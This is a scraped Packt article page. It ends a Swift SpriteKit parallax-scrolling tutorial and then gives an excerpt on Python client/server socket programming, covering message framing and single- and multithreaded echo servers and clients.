parallaxNode.start(duration: duration)    }       func stop() {        parallaxNode.stop()    } } The Startable protocol is implemented by forwarding the methods to ParallaxNode. How to implement the scrolling The idea of implementing scrolling is really straightforward: we implement a node where we put two copies of the same image in a tiled format. We then place the node such that we have the left half fully visible. Then we move the entire node to the left until we fully present the left node. Finally, we reset the position to the original one and restart the cycle. The following figure explains this algorithm: import SpriteKit   class ParallaxNode {    private let node: SKSpriteNode!       
init(textureNamed: String) {        let leftHalf = createHalfNodeTexture(textureNamed, offsetX: 0)        let rightHalf = createHalfNodeTexture(textureNamed, offsetX: leftHalf.size.width)               let size = CGSize(width: leftHalf.size.width + rightHalf.size.width,            height: leftHalf.size.height)               node = SKSpriteNode(color: UIColor.whiteColor(), size: size)        node.anchorPoint = CGPointZero        node.position = CGPointZero        node.addChild(leftHalf)        node.addChild(rightHalf)    }       func zPosition(zPosition: CGFloat) -> ParallaxNode {        node.zPosition = zPosition        return self    }       func addTo(parentNode: SKSpriteNode) -> ParallaxNode {        parentNode.addChild(node)        return self    }   } The init() method simply creates the two halves, puts them side by side, and sets the position of the node: // Mark: Private private func createHalfNodeTexture(textureNamed: String, offsetX: CGFloat) -> SKSpriteNode {    let node = SKSpriteNode(imageNamed: textureNamed,                            normalMapped: true)    node.anchorPoint = CGPointZero    node.position = CGPoint(x: offsetX, y: 0)    return node } The half node is just a node with the correct offset for the x-coordinate: // Mark: Startable extension ParallaxNode {    func start(#duration: NSTimeInterval) {        node.runAction(SKAction.repeatActionForever(SKAction.sequence(            [                SKAction.moveToX(-node.size.width/2.0, duration: duration),                SKAction.moveToX(0, duration: 0)            ]            )))    }       func stop() {        node.removeAllActions()    } } Finally, the Startable protocol is implemented using two actions in a sequence. First, we move half the size—which means an image width—to the left, and then we move the node to the original position to start the cycle again. This is what the final result looks like: You can find the code for this version at https://github.com/gscalzo/FlappySwift/tree/stage_with_parallax_levels. Summary This article has given an idea on how to go about direction that you need to build a clone of the Flappy Bird app. For the complete exercise and a lot more, please refer to Swift by Example by Giordano Scalzo. Resources for Article: Further resources on this subject: Playing with Swift [article] Configuring Your Operating System [article] Updating data in the background [article]

article-image-client-and-server-applications
Packt
16 Jun 2015
27 min read
Save for later

Client and Server Applications

Packt
16 Jun 2015
27 min read
In this article by, Sam Washington and Dr. M. O. Faruque Sarker, authors of the book Learning Python Network Programming, we're going to use sockets to build network applications. Sockets follow one of the main models of computer networking, that is, the client/server model. We'll look at this with a focus on structuring server applications. We'll cover the following topics: Designing a simple protocol Building an echo server and client (For more resources related to this topic, see here.) The examples in this article are best run on Linux or a Unix operating system. The Windows sockets implementation has some idiosyncrasies, and these can create some error conditions, which we will not be covering here. Note that Windows does not support the poll interface that we'll use in one example. If you do use Windows, then you'll probably need to use ctrl + break to kill these processes in the console, rather than using ctrl - c because Python in a Windows command prompt doesn't respond to ctrl – c when it's blocking on a socket send or receive, which will be quite often in this article! (and if, like me, you're unfortunate enough to try testing these on a Windows laptop without a break key, then be prepared to get very familiar with the Windows Task Manager's End task button). Client and server The basic setup in the client/server model is one device, the server that runs a service and patiently waits for clients to connect and make requests to the service. A 24-hour grocery shop may be a real world analogy. The shop waits for customers to come in and when they do, they request certain products, purchase them and leave. The shop might advertise itself so people know where to find it, but the actual transactions happen while the customers are visiting the shop. A typical computing example is a web server. The server listens on a TCP port for clients that need its web pages. When a client, for example a web browser, requires a web page that the server hosts, it connects to the server and then makes a request for that page. The server replies with the content of the page and then the client disconnects. The server advertises itself by having a hostname, which the clients can use to discover the IP address so that they can connect to it. In both of these situations, it is the client that initiates any interaction – the server is purely responsive to that interaction. So, the needs of the programs that run on the client and server are quite different. Client programs are typically oriented towards the interface between the user and the service. They retrieve and display the service, and allow the user to interact with it. Server programs are written to stay running for indefinite periods of time, to be stable, to efficiently deliver the service to the clients that are requesting it, and to potentially handle a large number of simultaneous connections with a minimal impact on the experience of any one client. In this article, we will look at this model by writing a simple echo server and client, which can handle a session with multiple clients. The socket module in Python perfectly suits this task. An echo protocol Before we write our first client and server programs, we need to decide how they are going to interact with each other, that is we need to design a protocol for their communication. Our echo server should listen until a client connects and sends a bytes string, then we want it to echo that string back to the client. We only need a few basic rules for doing this. 
These rules are as follows: Communication will take place over TCP. The client will initiate an echo session by creating a socket connection to the server. The server will accept the connection and listen for the client to send a bytes string. The client will send a bytes string to the server. Once it sends the bytes string, the client will listen for a reply from the server When it receives the bytes string from the client, the server will send the bytes string back to the client. When the client has received the bytes string from the server, it will close its socket to end the session. These steps are straightforward enough. The missing element here is how the server and the client will know when a complete message has been sent. Remember that an application sees a TCP connection as an endless stream of bytes, so we need to decide what in that byte stream will signal the end of a message. Framing This problem is called framing, and there are several approaches that we can take to handle it. The main ones are described here: Make it a protocol rule that only one message will be sent per connection, and once a message has been sent, the sender will immediately close the socket. Use fixed length messages. The receiver will read the number of bytes and know that they have the whole message. Prefix the message with the length of the message. The receiver will read the length of the message from the stream first, then it will read the indicated number of bytes to get the rest of the message. Use special character delimiters for indicating the end of a message. The receiver will scan the incoming stream for a delimiter, and the message comprises everything up to the delimiter. Option 1 is a good choice for very simple protocols. It's easy to implement and it doesn't require any special handling of the received stream. However, it requires the setting up and tearing down of a socket for every message, and this can impact performance when a server is handling many messages at once. Option 2 is again simple to implement, but it only makes efficient use of the network when our data comes in neat, fixed-length blocks. For example in a chat server the message lengths are variable, so we will have to use a special character, such as the null byte, to pad messages to the block size. This only works where we know for sure that the padding character will never appear in the actual message data. There is also the additional issue of how to handle messages longer than the block length. Option 3 is usually considered as one of the best approaches. Although it can be more complex to code than the other options, the implementations are still reasonably straightforward, and it makes efficient use of bandwidth. The overhead imposed by including the length of each message is usually minimal as compared to the message length. It also avoids the need for any additional processing of the received data, which may be needed by certain implementations of option 4. Option 4 is the most bandwidth-efficient option, and is a good choice when we know that only a limited set of characters, such as the ASCII alphanumeric characters, will be used in messages. If this is the case, then we can choose a delimiter character, such as the null byte, which will never appear in the message data, and then the received data can be easily broken into messages as this character is encountered. Implementations are usually simpler than option 3. 
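For comparison, here is a minimal sketch of what option 3, length-prefixing, might look like in Python. It is not part of the protocol used in this article, and the choice of a 4-byte big-endian length header is an assumption made purely for illustration:

import struct

def send_frame(sock, data):
    # Prefix the payload with a 4-byte big-endian length header
    sock.sendall(struct.pack('!I', len(data)) + data)

def recv_exactly(sock, count):
    # Keep calling recv() until we have exactly count bytes
    data = bytearray()
    while len(data) < count:
        chunk = sock.recv(count - len(data))
        if not chunk:
            raise ConnectionError('Socket closed mid-frame')
        data.extend(chunk)
    return bytes(data)

def recv_frame(sock):
    # Read the header first, then exactly that many payload bytes
    (length,) = struct.unpack('!I', recv_exactly(sock, 4))
    return recv_exactly(sock, length)

The receiver never has to scan the payload for special characters, which is why this approach copes with arbitrary binary data so easily.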
Although it is possible to employ the delimiter method for arbitrary data, that is, where the delimiter could also appear as a valid character in a message, this requires the use of character escaping, which needs an additional round of processing of the data. Hence, in these situations, it's usually simpler to use length-prefixing.

For our echo and chat applications, we'll be using the UTF-8 character set to send messages. The null byte isn't used in any character in UTF-8 except for the null byte itself, so it makes a good delimiter. Thus, we'll be using method 4 with the null byte as the delimiter to frame our messages. So, our last rule, number 8, will become:

Messages will be encoded in the UTF-8 character set for transmission, and they will be terminated by the null byte.

Now, let's write our echo programs.

A simple echo server

As we work through this article, we'll find ourselves reusing several pieces of code, so to save ourselves from repetition, we'll set up a module with useful functions that we can reuse as we go along. Create a file called tincanchat.py and save the following code in it:

import socket

HOST = ''
PORT = 4040

def create_listen_socket(host, port):
    """ Setup the sockets our server will receive connection requests on """
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    sock.bind((host, port))
    sock.listen(100)
    return sock

def recv_msg(sock):
    """ Wait for data to arrive on the socket, then parse into messages using b'\0' as message delimiter """
    data = bytearray()
    msg = ''
    # Repeatedly read 4096 bytes off the socket, storing the bytes
    # in data until we see a delimiter
    while not msg:
        recvd = sock.recv(4096)
        if not recvd:
            # Socket has been closed prematurely
            raise ConnectionError()
        data = data + recvd
        if b'\0' in recvd:
            # we know from our protocol rules that we only send
            # one message per connection, so b'\0' will always be
            # the last character
            msg = data.rstrip(b'\0')
    msg = msg.decode('utf-8')
    return msg

def prep_msg(msg):
    """ Prepare a string to be sent as a message """
    msg += '\0'
    return msg.encode('utf-8')

def send_msg(sock, msg):
    """ Send a string over a socket, preparing it first """
    data = prep_msg(msg)
    sock.sendall(data)

First, we define a default interface and a port number to listen on. The empty '' interface, specified in the HOST variable, tells socket.bind() to listen on all available interfaces. If you want to restrict access to just your machine, then change the value of the HOST variable at the beginning of the code to 127.0.0.1.

We'll be using create_listen_socket() to set up our server listening connections. This code is the same for several of our server programs, so it makes sense to reuse it.

The recv_msg() function will be used by our echo server and client for receiving messages from a socket. In our echo protocol, there isn't anything that our programs may need to do while they're waiting to receive a message, so this function just calls socket.recv() in a loop until it has received the whole message. As per our framing rule, it will check the accumulated data on each iteration to see if it has received a null byte, and if so, then it will return the received data, stripping off the null byte and decoding it from UTF-8.

The send_msg() and prep_msg() functions work together for framing and sending a message.
We've separated the null byte termination and the UTF-8 encoding into prep_msg() because we will use them in isolation later on. Handling received data Note that we're drawing ourselves a careful line with these send and receive functions as regards string encoding. Python 3 strings are Unicode, while the data that we receive over the network is bytes. The last thing that we want to be doing is handling a mixture of these in the rest of our program code, so we're going to carefully encode and decode the data at the boundary of our program, where the data enters and leaves the network. This will ensure that any functions in the rest of our code can assume that they'll be working with Python strings, which will later on make things much easier for us. Of course, not all the data that we may want to send or receive over a network will be text. For example, images, compressed files, and music, can't be decoded to a Unicode string, so a different kind of handling is needed. Usually this will involve loading the data into a class, such as a Python Image Library (PIL) image for example, if we are going to manipulate the object in some way. There are basic checks that could be done here on the received data, before performing full processing on it, to quickly flag any problems with the data. Some examples of such checks are as follows: Checking the length of the received data Checking the first few bytes of a file for a magic number to confirm a file type Checking values of higher level protocol headers, such as the Host header in an HTTP request This kind of checking will allow our application to fail fast if there is an obvious problem. The server itself Now, let's write our echo server. Open a new file called 1.1-echo-server-uni.py and save the following code in it: import tincanchat   HOST = tincanchat.HOST PORT = tincanchat.PORT   def handle_client(sock, addr):    """ Receive data from the client via sock and echo it back """    try:        msg = tincanchat.recv_msg(sock) # Blocks until received                                          # complete message        print('{}: {}'.format(addr, msg))        tincanchat.send_msg(sock, msg) # Blocks until sent    except (ConnectionError, BrokenPipeError):        print('Socket error')    finally:        print('Closed connection to {}'.format(addr))        sock.close()   if __name__ == '__main__':    listen_sock = tincanchat.create_listen_socket(HOST, PORT)    addr = listen_sock.getsockname()    print('Listening on {}'.format(addr))      while True:        client_sock, addr = listen_sock.accept()        print('Connection from {}'.format(addr))        handle_client(client_sock, addr) This is about as simple as a server can get! First, we set up our listening socket with the create_listen_socket() call. Second, we enter our main loop, where we listen forever for incoming connections from clients, blocking on listen_sock.accept(). When a client connection comes in, we invoke the handle_client() function, which handles the client as per our protocol. We've created a separate function for this code, partly to keep the main loop tidy, and partly because we'll want to reuse this set of operations in later programs. That's our server, now we just need to make a client to talk to it. 
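Before writing the full client, you can give the running server a quick sanity check with a throwaway snippet that reuses the tincanchat helpers defined above (this assumes the server from the previous listing is already running and reachable on 127.0.0.1):

import socket
import tincanchat

# One-shot test: connect, send a message, print the echo, disconnect
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(('127.0.0.1', tincanchat.PORT))
tincanchat.send_msg(sock, 'testing 1 2 3')  # blocks until sent
print(tincanchat.recv_msg(sock))            # should print 'testing 1 2 3'
sock.close()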
A simple echo client

Create a file called 1.2-echo_client-uni.py and save the following code in it:

import sys, socket
import tincanchat

HOST = sys.argv[-1] if len(sys.argv) > 1 else '127.0.0.1'
PORT = tincanchat.PORT

if __name__ == '__main__':
    while True:
        try:
            sock = socket.socket(socket.AF_INET,
                                 socket.SOCK_STREAM)
            sock.connect((HOST, PORT))
            print('\nConnected to {}:{}'.format(HOST, PORT))
            print("Type message, enter to send, 'q' to quit")
            msg = input()
            if msg == 'q': break
            tincanchat.send_msg(sock, msg)  # Blocks until sent
            print('Sent message: {}'.format(msg))
            msg = tincanchat.recv_msg(sock)  # Blocks until received
                                             # complete message
            print('Received echo: ' + msg)
        except ConnectionError:
            print('Socket error')
            break
        finally:
            sock.close()
            print('Closed connection to server\n')

If we're running our server on a different machine from the one on which we are running the client, then we can supply the IP address or the hostname of the server as a command line argument to the client program. If we don't, then it will default to trying to connect to the localhost. The third and fourth lines of the code check the command line arguments for a server address.

Once we've determined which server to connect to, we enter our main loop, which loops forever until we kill the client by entering q as a message. Within the main loop, we first create a connection to the server. Second, we prompt the user to enter the message to send and then we send the message using the tincanchat.send_msg() function. We then wait for the server's reply. Once we get the reply, we print it and then we close the connection as per our protocol.

Give our client and server a try. Run the server in a terminal by using the following command:

$ python 1.1-echo_server-uni.py
Listening on ('0.0.0.0', 4040)

In another terminal, run the client and note that you will need to specify the server if you need to connect to another computer, as shown here:

$ python 1.2-echo_client.py 192.168.0.7
Type message, enter to send, 'q' to quit

Running the terminals side by side is a good idea, because you can simultaneously see how the programs behave. Type a few messages into the client and see how the server picks them up and sends them back. Disconnecting with the client should also prompt a notification on the server.

Concurrent I/O

If you're adventurous, then you may have tried connecting to our server using more than one client at once. If you tried sending messages from both of them, then you'd have seen that it does not work as we might have hoped. If you haven't tried this, then give it a go.

A working echo session on the client should look like this:

Type message, enter to send. 'q' to quit
hello world
Sent message: hello world
Received echo: hello world
Closed connection to server

However, when trying to send a message by using a second connected client, we'll see something like this:

Type message, enter to send. 'q' to quit
hello world
Sent message: hello world

The client will hang when the message is sent, and it won't get an echo reply. You may also notice that if we send a message by using the first connected client, then the second client will get its response. So, what's going on here?
The problem is that the server can only listen for the messages from one client at a time. As soon as the first client connects, the server blocks at the socket.recv() call in tincanchat.recv_msg(), waiting for the first client to send a message. The server isn't able to receive messages from other clients while this is happening and so, when another client sends a message, that client blocks too, waiting for the server to send a reply. This is a slightly contrived example. The problem in this case could easily be fixed in the client end by asking the user for an input before establishing a connection to the server. However in our full chat service, the client will need to be able to listen for messages from the server while simultaneously waiting for user input. This is not possible in our present procedural setup. There are two solutions to this problem. We can either use more than one thread or process, or use non-blocking sockets along with an event-driven architecture. We're going to look at both of these approaches, starting with multithreading. Multithreading and multiprocessing Python has APIs that allow us to write both multithreading and multiprocessing applications. The principle behind multithreading and multiprocessing is simply to take copies of our code and run them in additional threads or processes. The operating system automatically schedules the threads and processes across available CPU cores to provide fair processing time allocation to all the threads and processes. This effectively allows a program to simultaneously run multiple operations. In addition, when a thread or process blocks, for example, when waiting for IO, the thread or process can be de-prioritized by the OS, and the CPU cores can be allocated to other threads or processes that have actual computation to do. Here is an overview of how threads and processes relate to each other: Threads exist within processes. A process can contain multiple threads but it always contains at least one thread, sometimes called the main thread. Threads within the same process share memory, so data transfer between threads is just a case of referencing the shared objects. Processes do not share memory, so other interfaces, such as files, sockets, or specially allocated areas of shared memory, must be used for transferring data between processes. When threads have operations to execute, they ask the operating system thread scheduler to allocate them some time on a CPU, and the scheduler allocates the waiting threads to CPU cores based on various parameters, which vary from OS to OS. Threads in the same process may run on separate CPU cores at the same time. Although two processes have been displayed in the preceding diagram, multiprocessing is not going on here, since the processes belong to different applications. The second process is displayed to illustrates a key difference between Python threading and threading in most other programs. This difference is the presence of the GIL. Threading and the GIL The CPython interpreter (the standard version of Python available for download from www.python.org) contains something called the Global Interpreter Lock (GIL). The GIL exists to ensure that only a single thread in a Python process can run at a time, even if multiple CPU cores are present. The reason for having the GIL is that it makes the underlying C code of the Python interpreter much easier to write and maintain. 
The drawback of this is that Python programs using multithreading cannot take advantage of multiple cores for parallel computation. This is a cause of much contention; however, for us this is not so much of a problem. Even with the GIL present, threads that are blocking on I/O are still de-prioritized by the OS and put into the background, so threads that do have computational work to do can run instead. The following figure is a simplified illustration of this: The Waiting for GIL state is where a thread has sent or received some data and so is ready to come out of the blocking state, but another thread has the GIL, so the ready thread is forced to wait. In many network applications, including our echo and chat servers, the time spent waiting on I/O is much higher than the time spent processing data. As long as we don't have a very large number of connections (a situation we'll discuss later on when we come to event driven architectures), thread contention caused by the GIL is relatively low, and hence threading is still a suitable architecture for these network server applications. With this in mind, we're going to use multithreading rather than multiprocessing in our echo server. The shared data model will simplify the code that we'll need for allowing our chat clients to exchange messages with each other, and because we're I/O bound, we don't need processes for parallel computation. Another reason for not using processes in this case is that processes are more "heavyweight" in terms of the OS resources, so creating a new process takes longer than creating a new thread. Processes also use more memory. One thing to note is that if you need to perform an intensive computation in your network server application (maybe you need to compress a large file before sending it over the network), then you should investigate methods for running this in a separate process. Because of quirks in the implementation of the GIL, having even a single computationally intensive thread in a mainly I/O bound process when multiple CPU cores are available can severely impact the performance of all the I/O bound threads. For more details, go through the David Beazley presentations linked to in the following information box: Processes and threads are different beasts, and if you're not clear on the distinctions, it's worthwhile to read up. A good starting point is the Wikipedia article on threads, which can be found at http://en.wikipedia.org/wiki/Thread_(computing). A good overview of the topic is given in Chapter 4 of Benjamin Erb's thesis, which is available at http://berb.github.io/diploma-thesis/community/. Additional information on the GIL, including the reasoning behind keeping it in Python can be found in the official Python documentation at https://wiki.python.org/moin/GlobalInterpreterLock. You can also read more on this topic in Nick Coghlan's Python 3 Q&A, which can be found at http://python-notes.curiousefficiency.org/en/latest/python3/questions_and_answers.html#but-but-surely-fixing-the-gil-is-more-important-than-fixing-unicode. Finally, David Beazley has done some fascinating research on the performance of the GIL on multi-core systems. Two presentations of importance are available online. They give a good technical background, which is relevant to this article. These can be found at http://pyvideo.org/video/353/pycon-2010--understanding-the-python-gil---82 and at https://www.youtube.com/watch?v=5jbG7UKT1l4. 
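The point about I/O-bound threads is easy to demonstrate with a small experiment. The snippet below is not from the book; it uses time.sleep() as a stand-in for a blocking socket call, since both release the GIL while they wait, which is why the five workers finish in roughly one second rather than five:

import threading
import time

def fake_io(n):
    # Pretend to wait on the network; sleeping releases the GIL, just as a blocking recv() would
    time.sleep(1)
    print('worker {} done'.format(n))

start = time.time()
threads = [threading.Thread(target=fake_io, args=[n]) for n in range(5)]
for thread in threads:
    thread.start()
for thread in threads:
    thread.join()
print('Elapsed: {:.1f}s'.format(time.time() - start))  # roughly 1.0s, not 5.0s

If the workers were doing heavy computation instead of waiting, the GIL would serialize them and the elapsed time would climb accordingly, which is exactly the situation where moving the work into a separate process becomes worth the extra cost.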
A multithreaded echo server A benefit of the multithreading approach is that the OS handles the thread switches for us, which means we can continue to write our program in a procedural style. Hence we only need to make small adjustments to our server program to make it multithreaded, and thus, capable of handling multiple clients simultaneously. Create a new file called 1.3-echo_server-multi.py and add the following code to it: import threading import tincanchat   HOST = tincanchat.HOST PORT = tincanchat.PORT   def handle_client(sock, addr):    """ Receive one message and echo it back to client, then close        socket """    try:        msg = tincanchat.recv_msg(sock) # blocks until received                                          # complete message        msg = '{}: {}'.format(addr, msg)        print(msg)        tincanchat.send_msg(sock, msg) # blocks until sent    except (ConnectionError, BrokenPipeError):        print('Socket error')    finally:        print('Closed connection to {}'.format(addr))        sock.close()   if __name__ == '__main__':    listen_sock = tincanchat.create_listen_socket(HOST, PORT)    addr = listen_sock.getsockname()    print('Listening on {}'.format(addr))      while True:        client_sock,addr = listen_sock.accept()        # Thread will run function handle_client() autonomously        # and concurrently to this while loop        thread = threading.Thread(target=handle_client,                                  args=[client_sock, addr],                                  daemon=True)        thread.start()        print('Connection from {}'.format(addr)) You can see that we've just imported an extra module and modified our main loop to run our handle_client() function in separate threads, rather than running it in the main thread. For each client that connects, we create a new thread that just runs the handle_client() function. When the thread blocks on a receive or send, the OS checks the other threads to see if they have come out of a blocking state, and if any have, then it switches to one of them. Notice that we have set the daemon argument in the thread constructor call to True. This will allow the program to exit if we hit ctrl - c without us having to explicitly close all of our threads first. If you try this echo server with multiple clients, then you'll see that a second client that connects and sends a message will immediately get a response. Summary We looked at how to develop network protocols while considering aspects such as the connection sequence, framing of the data on the wire, and the impact these choices will have on the architecture of the client and server programs. We worked through different architectures for network servers and clients, demonstrating the multithreaded models by writing a simple echo server. Resources for Article: Further resources on this subject: Importing Dynamic Data [article] Driving Visual Analyses with Automobile Data (Python) [article] Preparing to Build Your Own GIS Application [article]